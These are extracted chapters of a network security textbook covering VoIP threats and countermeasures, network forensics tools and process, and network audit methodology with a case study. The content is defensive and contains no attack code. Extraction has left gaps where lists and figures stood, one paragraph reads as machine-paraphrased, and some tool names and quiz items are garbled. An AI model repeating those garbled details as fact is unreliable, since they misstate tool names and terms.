As with any technology, there's a security aspect that we also need to account for. In this
case, VoIP is susceptible to attacks such as DoS, spoofing, man-in-the-middle, and so on.
Next, we will try to understand some of these issues and the countermeasures we can use
to deal with them.
First, we should focus on the security of the underlying base platform that the VoIP services
are running on, such as Windows or Linux OS. Next are the various components that make
up the VoIP network, such as voice terminals, firewalls, switches, and routers. Following
this, we have the actual application and hardware being used, as provided by the VoIP
service provider, which may contain different sub-components that may be vulnerable.
[ 187 ]
Advanced Network Attacks Chapter 5
The crux of the matter is to measure all these aspects across the CIA triad and place
adequate measures for them. For example, a lack of confidentiality can result in the loss of
critical data being disclosed to an unauthorized party. Integrity can be compromised if data
is altered and availability can result in service disruption, as shown in the following
diagram:
The major prominent threats pertaining to VoIP technology will be briefly discussed next.
Vishing
Also known as voice phishing, this is a malicious technique used by threat actors to spoof
the details of the call, such as the caller ID. This is a tactic used for malicious intent, where
the threat actor impersonates a trusted entity and employs social engineering or other
techniques to gain confidential information from the target user.
Several mitigations can be employed to defend against DoS attacks, including blacklisting
known malicious counterparts, enforcing authentication, and assessing the network's
design, as well as deploying DoS mitigation solutions such as Myra and Northforge. DoS
attacks pose perhaps the greatest threat to enterprise VoIP systems, and hence it's
important to ensure adequate mitigations against.
[ 188 ]
Advanced Network Attacks Chapter 5
Eavesdropping
Eavesdropping is a tactic used by threat actors to intercept the communication between the
sender and the receiver. This can lead to the disclosure of critical information, hence
impacting the confidentiality aspect of communication. Some mitigations that can be
employed include utilizing secure hardware and software, ensuring physical security
controls to the networking room and other sensitive areas, enforcing the encryption of VoIP
traffic, and so on.
Moving forward, we will take a look at the different attacks that take place on VoIP
networks and their countermeasures.
Besides the ones we've discussed, other commonly observed VoIP attacks include
impersonation and identity spoofing, signal protocol tampering, repudiation attacks,
registration hijacking an SIP, malformed messages, and SIP command, to name a few. From
time to time, attacks such as flooding, replay attacks, and physical attacks on VoIP
infrastructure have also been observed.
Now that we understand the different attack scenarios, we will take a look at how to
mitigate such attacks.
The signaling protocols and their defenses include H.235, a security framework that deals
with integrity, privacy, and authentication. Besides that, there's also S/MIME, IPsec, Secure
Real-Time Protocol (SRTP), and so on. Key management is another important aspect when
securing VoIP. In the context of VoIP environments, we can take a look at Multimedia
Internet Keying (MIKEY) and the Zimmermann Real-Time Transport Protocol (ZRTP).
[ 189 ]
Advanced Network Attacks Chapter 5
VoIP has turned into a key empowering innovation for media correspondence on the IP
system. Moreover, the internet open system practically wipes out geographic impediments
for setting telephone calls. Notwithstanding, VoIP utilizes the current IP system and, in this
way, acquires its security flaws. To consider the threats that are identified with VoIP, we
should comprehend basic VoIP engineering and present barrier instruments, as well as the
potential dangers and assaults on VoIP systems.
The following table outlines the top attacks and their countermeasures:
Before we conclude, there are also a few platforms we can use for VoIP monitoring and
security. Let's quickly take a look.
[ 190 ]
Advanced Network Attacks Chapter 5
Summary
In this chapter, we discussed the different threats that are faced by industrial control
systems, prominent attacks in the recent past, the cyber kill chain, and threats pertaining to
IoT and VoIP, as well as how to mitigate them. We took a deep dive into the attack
framework for the ICS industry, which has helped us understand the different types of
attack tactics that are used against the ICS environment and what deployments we can
ensure are in place in order to detect and mitigate such attacks. Then, we learned about the
key penetration testing approaches that we should focus on and utilize while assessing
them for threats. This provided us with a fundamental understanding of the security
loopholes that are exploited by threat actors and what we need to fix. We also looked at
how to assess VoIP for threats, as well as various mitigation techniques that can be
employed to secure this.
In the next chapter, we will talk about network digital forensics and understand the key
approaches and platforms we can use for this. We will also look at deep stats and big data
analytics-based forensics, as well as intelligent forensics.
Questions
The following is a list of questions so that you can test your knowledge regarding this
chapter's material. You will find the answers in the Assessments section of the Appendix:
[ 191 ]
Advanced Network Attacks Chapter 5
2. What are the best genuine advantages for a modern VoIP office handset such as
those from Cisco or Polycom?
Easy phone access to emails
Better than POTS call quality
Support for Unified Communication (UC) to email, voicemail, instant
messaging, video chat, and more
Automatic access to POTS when internet access fails
[ 192 ]
Advanced Network Attacks Chapter 5
Further reading
To expand on what you have learned in this chapter, visit the following links:
[ 193 ]
6
Network Digital Forensics
Network forensics is the process of looking at network artifacts to determine whether any
unauthorized activity has taken place, as well as retrieving artifacts and evidence to prove
it. This includes, but is not limited to, network monitoring, network recording, and
active/passive analysis of network traffic and events for correlation. Analysts can use these
techniques to uncover the origins of security events and perform root cause analysis.
The idea behind a strong forensics practice is to enable the blue team to improve their
detection techniques and have better understanding and visibility throughout the network.
In this chapter, we will look at how to perform network forensics and learn how to utilize
these results to build a strong security mechanism.
Technical requirements
You will make the best out of the chapter if you familiarize yourself with network forensic
platforms such as the following before you begin:
Xplico
NetworkMiner
Hakabana
PassiveDNS
Solera Networks DS
DSHELL
LogRhythm Network Monitor
Network forensics involves collecting and conducting an analysis of the network packets to
understand the complete picture of the incident. The crux is to collect and preserve
evidence while conducting analysis to get a complete picture of what happened, who did
what, and produce sound technical evidence and inferences to support the hypotheses. This
includes analyzing the network data from firewalls, IDSes/IPSes, and other perimeters and
internal networking devices.
Identification: This is the primary step and deals with identifying the logs,
evidence, and artifacts that need to be collected for network forensics analysis.
Collection: This involves actually collecting the digital evidence and
documenting the aspects of the scene such as physical and digital attributes, as
dictated by the law. This evidence and documentation should be admissible in a
court of law (if required). Hence, it is best to be familiar with the legal
requirements and follow the appropriate procedure.
[ 195 ]
Network Digital Forensics Chapter 6
Preservation: This is the act of preserving the evidence and ensuring that it is
safely stored for later analysis. This may also include the process of creating a
forensic copy of the evidence for later reference. Ensuring there's a chain of
custody throughout the process from this point onward is very important.
Examination and analysis: This is the stage of the forensic analysis process
where collected evidence is cataloged and an in-depth technical examination is
carried out. Post this, based on the evidence that's been gathered, the timeline of
the attack is created to come to a logical conclusion, as guided by the evidence
and inferences drawn from it.
Presentation: This is where the technical analysis that's been carried out is
summarized in a presentation to showcase the findings to the intended audience.
These were some of the fundamentals/basic steps that you need to keep in mind as you go
about performing network forensics. Next, we will take a look at the technical capabilities
that a forensic investigator like you should possess to adequately respond to incidents in a
live environment.
[ 196 ]
Network Digital Forensics Chapter 6
In most forensic engagements, you will be working as part of a larger team overseeing the
response capability to an incident. Some of the key aspects that are essential for the success
of the engagement include the following:
This list highlights the key aspects that should be considered for a forensic exercise;
however, given the size and priority of the engagement, there may be additional points that
would be mandated by the organization to meet these requirements. Different types of
network data can be pieced together so that we realize the complete picture of malicious
network activity. This includes network telemetry data, application data, and packet data.
Network forensics is not easy. Some key challenges include collecting the relevant artifacts
from the network and data correlation, as shown in the following diagram:
[ 197 ]
Network Digital Forensics Chapter 6
In the next section, we will take a look at the various network protocols and communication
layers, as well as the tools and platforms that we will use to dig deeper into the network.
This will also allow us to collect evidence and piece together the incident timeline.
Data link and physical layer detection (Ethernet): We utilize various sniffing
tools such as WindShark and TCPDump in order to capture the relevant data
traffic from the network interface. This enables you to filter data that needs
further investigation and helps form a picture of the transmissions that have
happened over the network.
Transport and network layer detection (TCP/IP): Here, the focus is on retrieving
information pertaining to the network activity in the target network, such as
packet transmission, routing tables, and source information. This information
helps in piecing together a picture of the attack scenario.
[ 198 ]
Network Digital Forensics Chapter 6
Examining traffic based on the use case (internet): This is a vast pool of rich
evidence that can range from services such as email, chat, web browsing, and file
transfer, among others.
Wireless: This can help with identifying devices that are connected to a
particular wireless connection, hence giving us its approximate location. Services
used, sites visited, and data transmitted can also be analyzed if certain
monitoring mechanisms are in place.
Besides these communication layers and protocols, there is also a tool known as Damballa,
which is an advanced threat detection system. It provides us with many advantages when
we perform a forensic examination of our network.
This special threat protection solution is specifically designed to identify hidden threats
operating in a corporate network using an array of patent-pending techno-technologies.
The following are some of its core advantages:
[ 199 ]
Network Digital Forensics Chapter 6
False-positives are virtually eliminated as Damballa Failsafe uses eight different profiles to
identify malicious traffic. The tool doesn't just look at a file and call it bad. It identifies a
malicious file or other activity and then looks for an indication that the file has actually
been executed or has performed an additional activity to strengthen the case that it infected
the last one. Eliminating false positives can be a big time-saver for IT employees. If the
antivirus software had removed the malicious file, there would be no execution on the
device and would result in time and effort savings for the team.
Damballa Failsafe also prioritizes each infection so that employees can deal with the higher-
priority infection first. Along with detecting the infection, it provides an extensive forensic
report for each identified infection, thereby answering questions such as when, what, who,
and how the incident took place.
The following is a screenshot of the Damballa Failsafe dashboard, which shows the number
of infected assets and other results:
In this section, we learned about the fundamentals of network forensics and the capabilities
that you will need as a forensic expert to detect threats. Now, we'll take a look at the
leading network forensic tools and platforms that should form your cyber arsenal for
conducting network analysis.
[ 200 ]
Network Digital Forensics Chapter 6
Real-time network analysis and monitoring can cater to this requirement, provided you
have the team trained on the right skillset and the monitoring solutions have been placed
and are working as intended. From a skill perspective, you should be familiar with tactics
and techniques such as understanding industry frameworks such as cyber kill chain and
ATT&CK matrix, industry-leading tools such as EDR, and forensics suites used for
conducting live forensics, e-discovery, and data recovery. You should also be familiar with
memory forensics, timeline analysis, and detecting anti-forensics tactics. SANS FOR508 is a
good training course that takes participants through all of these modules.
Besides these, there are many tools that can be used to our advantage for network analysis
and forensics. The upcoming sections will take you through the most common ones.
Wireshark
Wireshark is an open source traffic and packets analyzer that can be used to perform a
deep-dive analysis of network traffic:
[ 201 ]
Network Digital Forensics Chapter 6
Wireshark enables the investigator to see real-time traffic in the network. This can be used
to understand the different protocols in use and the information being exchanged across
the network.
[ 202 ]
Network Digital Forensics Chapter 6
The NIKSUN Suite is handy for forensically reconstructing network activities in order to
get clarity and a complete understanding of your network. It is one of the best analytical
tools available on the market and has powerful features and flexibility.
Security Onion
Security Onion is an Ubuntu-based Linux distribution that can be used for conducting
network monitoring, intrusion detection, log management, and so on.
[ 203 ]
Network Digital Forensics Chapter 6
Xplico
Xplico is a network forensic analysis tool that can extract data from internet traffic and the
underlying application.
[ 204 ]
Network Digital Forensics Chapter 6
It can extract data from protocols such as HTTP, IMAP, SMTP, POP, FPT, SIP, and so on.
NetworkMiner
NetworkMiner is a comprehensive network forensic analysis tool that has become
increasingly popular among security professionals for its capability and efficiency. It has
the ability to passively sniff network packets, which can assist in detecting details such as
OSes, hostnames, open ports, and so on.
[ 205 ]
Network Digital Forensics Chapter 6
Hakabana
Hakabana is a monitoring tool that provides visualization for network traffic by using Haka
and Kibana. It takes advantage of the Haka framework to capture packets, separate them,
and extract various pieces of information from the network, such as bandwidth, GeoIP
data, connection information, HTTP and DNS details, and so on.
[ 206 ]
Network Digital Forensics Chapter 6
NetWitness NextGen
NetWitness NextGen is a good tool for dealing with data leakage, compliance, insider
threat, and network e-discovery. It is being used by various government agencies and
financial institutions to ensure the safety of their network and to track threats proactively.
[ 207 ]
Network Digital Forensics Chapter 6
This tool is now known as RSA NetWitness and has been highly effective in
providing much-needed deep insights into network activities. It has also introduced
capabilities such as UEBA and advanced network analytics.
Solera Networks DS
Solera Networks DS is a network forensic tool that enables deep visibility into networks by
capturing, collecting, and filtering network traffic data for forensic investigations. This
creates network insights that can be leveraged for in-depth packet analysis.
Solera Networks has now been acquired by Blue Coat Systems. Due to this, it has become a
great boon for users as they can now leverage the evolved product, which provides them
with an end-to-end solution for their network needs.
[ 208 ]
Network Digital Forensics Chapter 6
DSHELL
DSHELL is an extensible network forensic analysis framework that supports the dissection
of network packets:
It is supported with key features such as the Ruste evaluation stream, IPv4 and IPv6
support, custom output handlers, and worthy decoders.
[ 209 ]
Network Digital Forensics Chapter 6
Besides the ones we discussed in this section, there are various other open source tools that
are available for specific activities pertaining to network security, such as the following:
[ 210 ]
Network Digital Forensics Chapter 6
This concludes the list of leading tools and platforms that will come in handy while you
conduct forensic analysis on a network. Please be aware that, every other day, a new tool
may hit the market and that, as an analyst, you should always be open to try and
experiment with as many tools as you can. This will not only hone your knowledge and
tool expertise but will also enable you to choose which tool is best for the problem at hand,
meaning you're not limited to a certain set.
Next, we will take a look at the key approaches to network forensics and how they can help
you conduct network forensic analysis.
It is important that the forensic investigation process has effective evidence collection and
storage capabilities for capturing and cataloging all meaningful artifacts. It should also
have an automated investigation capability in order to be effective and efficient in
searching and analysis across vast datasets. On top of this, it should have an acceptable
reporting capability.
[ 211 ]
Network Digital Forensics Chapter 6
Forensic investigators like you are also encouraged to align your practices to industrialized
frameworks such as the Integrated Digital Investigation Process (IDIP) framework, which
includes 17 phases. You should be familiar with other key frameworks such as Evidence
Graphs for Network Forensics Analysis, Forensics Zachman (FORZA), and the Generic
Process Model for Network Forensics, among others.
The following diagram shows the basic life cycle process of a network forensic process that
the aforementioned best practices mandate and that are followed by organizations:
There are variations based on the particular requirements, but the overall base structure
remains more or less the same.
[ 212 ]
Network Digital Forensics Chapter 6
There are various best practice guides available that focus on the process of digital evidence
handling. Next, we will take a look at some of the new advancements in the world of
network forensics and how those principles can be utilized to protect networks.
[ 213 ]
Network Digital Forensics Chapter 6
[ 214 ]
Network Digital Forensics Chapter 6
Now, as you know, a large organizational network has all three of these attributes. Hence, it
only makes sense to figure out ways to integrate two for better performance. Networks
typically have a large number of events generated on a daily basis, which consist of
different data types from different devices coming in at the same speed as the events that
are actually taking place in the network.
One of the recommended sources for learning more about the different
ways to implement big data for forensics is a Packt publication written by
Joe Sremack, titled Big Data Forensics – Learning Hadoop Investigations.
[ 215 ]
Network Digital Forensics Chapter 6
Gamification
Gamification is the process of introducing gaming concepts to make the current exercise
more engaging and competitive. Ensure that all your security teams' responses are
measured against each other and that points are awarded for each correct action. Certain
curveballs may also be thrown to test the resilience and out-of-the-box thinking capabilities
of the teams. Guide and provide hints when certain teams get stuck to help them proceed
further. This stage can be crucial to measure the level of engagement, teamwork, efficiency,
and knowledge they have, as well as the operational gap that may exist.
Summary
In this chapter, we became familiar with the core concepts of digital forensics and the
various tools and platforms that can be used by a digital forensic investigator to conduct a
network forensics investigation. We touched upon the aspects and leading platforms for
network analysis, as well as the industry best practices and standards that you should be
aware of.
We then learned about the various attributes that need attention while conducting a
network forensic investigation and the various tools that should be part of your arsenal as
an investigator. We also learned about the various frameworks that can be utilized to
formulate the investigation procedure. After this, we ensured that all the steps and phases
of a forensic investigation are conducted so that they're aligned with industry best
practices. This helps us avoid any evidence being dismissed by a court of law or those who
are the audience of the final forensic report.
In the next chapter, we will take a look at network auditing and study the various attributes
of a network auditing engagement. We will be taking a look at basic risk management and
the various tools and platforms that can be used as part of an auditing engagement.
[ 216 ]
Network Digital Forensics Chapter 6
Questions
The following is a list of questions to help you test your knowledge regarding this chapter's
material. You will find the answers in the Assessments section of the Appendix:
Ethereal
Snort
Tcpdump
John
[ 217 ]
Network Digital Forensics Chapter 6
8. Which of the following can be used for communicating between two computers?
HDHOST
DiskHost
DiskEdit
HostEditor
9. What is the evidence collected from network device logs?
Flow analysis
Active acquisition
Modes of detection
Packet analysis
10. By which method can you gain access to information such as SSID, MAC
addresses, supportedencryption/authentication algorithms?
Intercepting traffic in wireless media
Higher-layer traffic analysis
Intercepting traffic from hubs
Intercepting traffic from switches
[ 218 ]
Network Digital Forensics Chapter 6
Further reading
Introduction to Network Forensics (ENISA): https://www.enisa.europa.eu/
topics/trainings-for-cybersecurity-specialists/online-training-
material/documents/introduction-to-network-forensics-handbook.pdf
Reference links for Network Forensics: https://www.sciencedirect.com/
topics/computer-science/network-forensics
[ 219 ]
7
Performing Network Auditing
The process of auditing focuses on validating and assessing the effectiveness of the controls
that are in place. Similar to any Information Technology (IT) or information security
domain, network security is also subjected to predefined audit cycles to ensure the efficacy
of the security controls and their efficiency as part of the overall security program.
In this chapter, we will understand the processes, tools, frameworks, and industry
standards of network auditing.
Technical requirements
To get the most out of this chapter, please familiarize yourself with the following topics
before you begin:
Before we get into the gory details of network auditing, let's cover the basics. The following
subsections will take you through the details of what a network audit actually is, and we
will enumerate a few key concepts.
There are different varieties of network audits, where the scope and objectives of the audit
determine what the auditor looks at. Various organizations conduct annual audits of their
business-critical assets and systems, which is performed by an external audit firm. They
may or may not also be conducting half-yearly internal audits when there is a significant
change in the business, such as in the case of new business units being formed or in the case
of mergers and acquisitions.
The overall goal of network auditing is to ensure that the organization is in compliance
with the set standards and compliance and regulatory requirements that they are mandated
to follow. This also provides continuous feedback on the security status of the network, as
well as areas of improvement, which can be fixed prior to emerging or causing a security
liability.
[ 221 ]
Performing Network Auditing Chapter 7
Periodic auditing and reviewing networks are essential activities that need management
focus and due diligence. Besides this, there are other reasons to carry out a network audit,
as follows:
Now that we understand what a network audit is and why we need them, let's take a look
at the key concepts of an audit and its types.
[ 222 ]
Performing Network Auditing Chapter 7
Audit scope: While starting an audit, it's important to establish the scope of the audit in
order to set the correct expectations and outcomes for the auditing engagement. Broadly
speaking, four high-level audit categories can be considered:
With this basic understanding of what a network audit is and a few key terms, we will now
dig deeper into the concept of network auditing. We will try to understand the four pillars
of network auditing, the auditing process, the role of an auditor, and a few industry
standards.
[ 223 ]
Performing Network Auditing Chapter 7
Review: This is one of the most basic forms of audit, where the auditor needs
to examine based on experience and provide an opinion (as output). The output
needs to be examined in order to determine the course of action and the priority
in which it needs to be done. This can be broken down into architecture
review, policy review, and compliance review.
Assessment: Assessment involves analyzing the examination output for
prioritization based on the criticality and organizational and business relevance.
Quantifying the associated risk is also important to understand the impact of the
issue or threat at hand. For instance, let's say there are two financial servers and a
print server with the same vulnerability. The assessment should consider the
financial risk; what's more critical based on the threat impact and the risk
associated with the business?
Audit: Typically, an audit involves both assessment and review. It may also
include conducting gap analysis with respect to standards such as ISO/IEC
27000:2018 to measure how well the organization complies with regulatory
compliances such as HIPAA or PCI.
Policy audit
Compliance audit
Risk audit
Irrespective of the audit type and category, policies, procedures, standards, and controls
form the foundational pillars of any audit. A networking audit is no different from this.
[ 224 ]
Performing Network Auditing Chapter 7
Policy
The policy is crucial for organizations, irrespective of its operating size, industry vertical,
and geolocation. It acts as a binding agent between organizations and their users, and it
dictates how corporate resources behave. It also guides the overall organizational
operational approach by illustrating the need for such policies and how it's measured based
on industry best practices and applicability.
Procedures
Procedures are comprehensive instructions with respect to the implementation of policies.
Therefore, it is an important aspect that should be consulted in the implementation phases
and should be explicitly documented with the relevant policy. It acts as an operations
manual for the organization. This document can assist the auditor with insights into how
the organization operates and runs the processes.
Standards
Standards outline expected configurations and controls as per industry standards and/or
best practices. An example of a good password standard would be mandated password
length and complexity. Referring to standards documents such as NIST or ISO/IEC
27000:2018 helps rationalize as to why a technical configuration or product was selected in
order to comply with policy requirements.
[ 225 ]
Performing Network Auditing Chapter 7
Controls
Controls are the building blocks of any security mitigation that's implemented in the
organization. A major portion of an audit is centered on the many controls that an
organization has in order to reduce risk. Auditors focus on the effectiveness and efficiency
of implemented security controls against the threats that they are meant to mitigate against,
as per the organizational security plan.
These three primary categories can be further classified into preventive, detective,
corrective, and recovery. This helps with gauging the risks correctly during the risk
assessment:
[ 226 ]
Performing Network Auditing Chapter 7
The auditor needs to understand the interaction between the various controls to decide
whether the company under audit has thoroughly addressed its controls. An example that
depicts the logical grouping of controls for remote access VPNs is shown here:
Now that we understand the different aspects of auditing, let's take a look at the role that
risk management plays in a network audit.
Most organizations have a risk management program as most of the industrial standards
such as PCI, GLBA, SOX, and HIPAA require a risk management program. Organizations
need to have clarity on the threats and subsequent threats that they may face, which can be
achieved by quantifying the risk. This helps the auditor classify the findings under the right
category so that management understands the criticality of the findings so that they take
the appropriate actions.
Therefore, auditors need to conduct risk analysis to ensure their controls are effective. This
helps the auditor assist the organization in reducing the risk at hand by implementing
recommendations.
[ 227 ]
Performing Network Auditing Chapter 7
Risk assessment
There are two main approaches to risk measurement, namely quantitative and qualitative.
As quantitative methods require a lot of number crunching, most organizations use
qualitative methods only. Its results are actionable, and ratings can be customized as
critical, high, medium, and low. The formula that's used for risk calculation is as follows:
Let's take a look at what the different parts of the formula mean:
Threat: Anything that can cause potential harm to an organization or its business
operations is a threat. This can result in partial or complete impact on the CIA
triad.
Vulnerability: An avenue or loophole via which damage or harm can be done to
a system, process, or asset is known as a vulnerability. However, the existence of
a vulnerability doesn't always equate to the possibility of it being exploited.
Impact of exposure: This variable refers to the impact on the organization if the
threat is successfully exploited. It is important to note that the time taken to make
the exploit work is also a crucial factor. If a password takes 100 years to crack,
then it's not going to be a major concern as the password will be changed long
before those 100 years are up.
Given the dynamic aspect of today's businesses, periodic risk assessments are critical. Risk
assessment needs to be an ongoing process of identifying, rectifying, and resolving security
issues. NIST's six steps to risk assessment are as follows:
Next, we will take a look at the risk management strategies that can be utilized.
[ 228 ]
Performing Network Auditing Chapter 7
In broad terms, the idea of risk avoidance is to stop the activity that is causing
the risk.
In risk acceptance, we accept the risk as part of the business requirement.
Risk transfer refers to transferring the business risk to a third-party service
provider or vendor or buying insurance.
Risk mitigation, which is the preferred strategy, is where we put mitigating
controls in place to avert the risk. This may result in the elimination of the risk
entirely or producing some amount of risk even after the mitigation, which is
known as residual risk.
Some of the key questions to ask should be: Is your intellectual property adequately
protected? Are your business-critical applications and processes resilient? Can you ensure
your board, regulators, and clients, as well as your organization's data are protected? Do
you have an action plan for a breach? Do you have a plan to ensure you're operational after
a major cyber disruption?
Next, we will take a look at the various industry standards that can be employed by
organizations.
[ 229 ]
Performing Network Auditing Chapter 7
So far, our focus has been purely on what auditing is all about. But who is the person who
conducts a network audit?
Identify and report the risk, issues, observations, and findings with relevant
recommendations.
[ 230 ]
Performing Network Auditing Chapter 7
Now that we understand the key areas an auditor needs to focus on, let's look at the audit
process itself.
The planning stage: This is the first stage in the auditing process and focuses on
forming an overall plan for the audit. This helps in documenting the purpose of
the audit, as well as the requirements and standards that will be referred to and
measuring the findings. This also includes determining the objectives, scope, and
time frame.
The research stage: This is the second stage, and the focus is on operational
attributes such as skills, technology, organization structure, process and flow of
data, identifying the correct stakeholders to be interviewed, the process for
control testing, and creating an audit checklist.
The data gathering stage: This is the third stage of the audit, where the audit
itself is conducted. The checklist and standards and compliance/regulatory
requirements that were articulated in the planning and research stage are now put
to use for benchmarking. Technical control testing is conducted in this stage,
along with personnel interviews, documentation reviews, and processes.
The data analysis stage: This is the fourth stage of the audit and is where the
evidence and observations that have been collected are analyzed. The auditor is
expected to reflect on these findings, draw conclusions, and determine the
severity of them while mapping them to the relevant industry standards and
regulatory compliance requirements, and then document recommendations for
the findings.
[ 231 ]
Performing Network Auditing Chapter 7
The audit report stage: This stage focuses on documenting the findings in the
required format and presenting them to management or the required authority.
Such reports contain two distinct sections:
Executive summary: This is meant for top management or senior
leadership to get an overview of the findings and the broad issues
at hand, as well as their impact, severity, and recommendations.
Detailed findings: This is typically meant to provide a complete
picture of each observation and their suggested mitigations in a
detailed format.
The follow-up stage: This is the final stage in the audit process and revolves
around validating that the recommendations provided in the earlier stages were
implemented correctly and have produced the desired outcomes and results. The
auditor is expected to reexamine the controls, processes, and procedures to make
sure that all the previously identified issues are now fixed.
So far, we have covered important aspects such as the essential aspects and requirements of
an audit, the different types, and risk management strategies and industrial frameworks.
With this, we are now well-equipped to learn about the stages involved in performing a
network audit.
[ 232 ]
Performing Network Auditing Chapter 7
In this stage, we determine the network's technical landscape, as well as identify the crown
jewels and the high-value targets in the environment, any recent changes, results of
previous audits, controls currently in place, and the current documentation and network
diagrams.
You need to construct a checklist that provides areas to be audited (the next section covers
this checklist in detail). You will use the network's inventory and mapping tools to
understand the network architecture and devices that are interconnected in the network.
In the data analysis phase, the data that's gathered needs to be categorized and used so that
you can distinguish between the evidence. You must also prioritize risks and ranks
according to their severity and then rank critical assets, potential threats, and
vulnerabilities. This is where auditor experience comes into play. Though tools produce
reports, you may need to use your experience to identify the relevant details from the
reports, as per the agreed scope with the customer. You are expected to provide
recommendations and opinions wherever required.
You need to present your findings to senior management. Usually, technical jargon is
avoided in the executive summary report. You need to prepare an architecture review
report that includes technical details that will be discussed with the technical team.
[ 233 ]
Performing Network Auditing Chapter 7
Finally, the audit report encompasses all the checklists for findings, evidence, risk severity,
and recommendations. You will agree on the actions and come up with the required
timelines for closure. You can use tools reports wherever required for the discussion.
However, you may need to analyze the reports before the discussion.
In the last and final phase, known as the follow-up phase, you ensure that the timelines that
were agreed to in the previous phase are met. At this stage, you may need to conduct a
subsequent review of the actions that were taken and fix the issues that have been reported.
You may need to update all the audit reports as per the review.
While discussing the data gathering stage previously, I mentioned analyzing and
interpreting reports. There are a variety of tools out there that can help us gather and
visualize data that will aid our network audit. We'll discuss them in the next section.
The tools you use will vary, depending on the audit's scope. However, at the time of
writing, vendors are coming up with unified product suites for network management and
monitoring. This section covers the best tools under each category. The organization has to
undertake due diligence to figure out the best tool as per their needs.
[ 234 ]
Performing Network Auditing Chapter 7
SolarWinds
The SolarWinds Network Topology Mapper has an automated process for identifying
available networks and creating a complete network topological map from a single network
scan. The following is a screenshot of its dashboard:
It also has a process for iterative scans. These keep updating the network topology based on
the incremental changes observed by each scan, which comes in handy for identifying any
malicious network alterations, rogue devices, and access points. It also has functions that
help check for adherence to regulatory compliance and other industry requirements.
[ 235 ]
Performing Network Auditing Chapter 7
Open-AudIT
Open-AudIT is another leading network auditing platform that can be used for software,
hardware, and Windows domain audits. It is extremely user-friendly and provides a host of
audit functionalities.
[ 236 ]
Performing Network Auditing Chapter 7
Nmap
Nmap is an open source platform for network reconnaissance and security auditing. It is
useful for quickly scanning large networks using IP packets to identify the live hosts, ports,
and services running on them. The following screenshot shows Nmap's operating system
name and version:
Today, Nmap is majorly used for network security operations, though it is also a useful
utility for network admins for conducting IT-related network operations.
NetformX
NetformX provides a vast range of professional solutions that enable organizations to
quickly design, build, and execute large-scale enterprise solutions. Some of the key
solutions, such as Netformx Discovery, can be used for conducting comprehensive
network audits and suggest upgrading for EOL or out-of-service applications, which is
especially helpful.
So far, we've discussed network assessment and auditing tools. Next, let's take a closer look
at security assessment tools.
[ 237 ]
Performing Network Auditing Chapter 7
While conducting such assessments, you should take into consideration that systems and
applications might suffer downtime, due to which service outages should be planned and a
contingency plan should be put in place.
Nessus
Nessus comes with pre-built policies and templates, as shown in the following screnshot:
[ 238 ]
Performing Network Auditing Chapter 7
If you upgrade to Nessus Pro, you can group vulnerabilities by several factors. It has
options to snooze certain vulnerabilities that are not crucial and can help you focus on
critical ones instead, thus reducing distractions or noise:
With Nessus Pro, you can create branded reports in a variety of formats (for example, CSV
and HTML) to easily share your most critical information with your team or client.
Nipper
Nipper is a handy tool that can be used to discover vulnerabilities and audit network
devices such as firewalls, switches, and routers. It also provides automated prioritization
with readily available recommendations and fixes to remediate the identified issues.
[ 239 ]
Performing Network Auditing Chapter 7
Nipper offers features such as audit reports for device configuration, security, vulnerability
and compliance, scheduled audits and SIEM integration, suggested technical fixes, and
remediation steps for the identified threats.
Wireshark
Wireshark is one of the most widely used network security platforms. It enables us to
capture live data in the network and analyze the data packets. It provides the analyst with
the ability to perform deep inspections and allows them to use decryption support such as
IPsec, ISAKMP, Kerberos, SSL/TLS, and WPA/WPA2, among others.
[ 240 ]
Performing Network Auditing Chapter 7
The following screenshot shows how Wireshark captures packets so that users can
examine their content:
Using an automated platform or tool for network security assessment and auditing helps
tremendously, yet we should be aware of all the checks that should be conducted as part of
a network audit. Hence, in the next section, we will take a look at the network audit
checklist and all the attributes that should be validated as part of the audit.
[ 241 ]
Performing Network Auditing Chapter 7
In this section, we will discuss the composition of a comprehensive checklist and list the
activities that should be in scope and taken into consideration. This will be followed by a
case study where we will create our own checklist of a dummy organization.
Comprehensive checklist
A comprehensive checklist should be customized as per the individual requirements. This
should be tied up with control areas such as the company's policy, industry standards, and
compliance such as ISO/IEC 27000:2018, NIST, assessment methods, risk category, the
evidence required, and recommendations for a complete audit report. Every step under
subdivision (design and architecture review, network infrastructure security, and so on)
should be detailed, depending on the audit scope.
Planning phase
The planning phase is focused on setting the right scope and documentation for the
attributes that will be validated or reviewed as part of the audit process. It includes the
following:
This helps us in setting the right context and ensuring that the outcomes will be as
expected.
[ 242 ]
Performing Network Auditing Chapter 7
Physical inventory
The focus here is to ensure there's documentation about all the hardware components in the
network, as well as connectivity, routing, and so on. It includes the following:
Next, we'll look at the attributes of the network infrastructure with respect to security.
[ 243 ]
Performing Network Auditing Chapter 7
Next, we will take a look at the infrastructure for monitoring and managing software and
applications.
The next phase is known as configuration management and focuses on the various
configurations and their alignment to industry best practices.
[ 244 ]
Performing Network Auditing Chapter 7
Configuration management
The focus here is on attributes such as backup, automation, and change management:
Next, we will take a look at the performance monitoring and analysis phase.
Next, we'll take a look at the last phase, which is the documentation phase.
Documentation
In the documentation phase, the focus is on ensuring that all the processes, procedures, and
configurations are well-documented and in place. The documentation includes the
following:
This concludes the audit checklist for a network audit. Now, we will take a look at a case
study for a network security audit and learn how to implement the principals that we have
learned about so far.
[ 245 ]
Performing Network Auditing Chapter 7
Case study
A financial institution has outsourced its network management activity of "Managing and
monitoring the institution's network and designing, configuring, and implementing additions and
improvements for the network" to a third-party vendor. The institution has also signed a
service agreement with the auditing firm to audit the outsourced work of network
monitoring and management.
Let's outline how the auditor went ahead with the network audit to get an idea of the entire
process:
Audit scope: As indicated in the previous sections, the auditor's first and
foremost task is to understand the audit scope. Here, the audit's scope is to audit
the third-party vendor on behalf of the financial institution. An auditor can use
the statement of work signed with the third-party vendor for the
activity, "Managing and monitoring the institution's network and designing,
configuring, and implementing additions and improvements for the network," on the
basis of the proposed checklist.
Audit plan: Specific guidelines that are to be followed during the audit
engagement.
Objective: To audit the third-party vendor for network monitoring and
management on behalf of the financial institution.
Scope: The auditing firm has to audit the third-party vendor as per the
customer's network policy, which demands that ISO/IEC 27000:2018 is adhered
to. As per the requirements, a third-party vendor has to set up a Network
Operation Center (NOC) to manage and monitor the customer's network. The
customer has listed NOC monitoring requirements that are part of the RFP.
Hence, the auditing firm has to audit the NOC as well.
Artifacts: The auditing firm has to submit a report to the customer highlighting
the risks and to provide recommendations as per their expertise.
Time Frame: 1 month.
Checklists: We will have two checklists:
Network monitoring checklist
NOC checklist
[ 246 ]
Performing Network Auditing Chapter 7
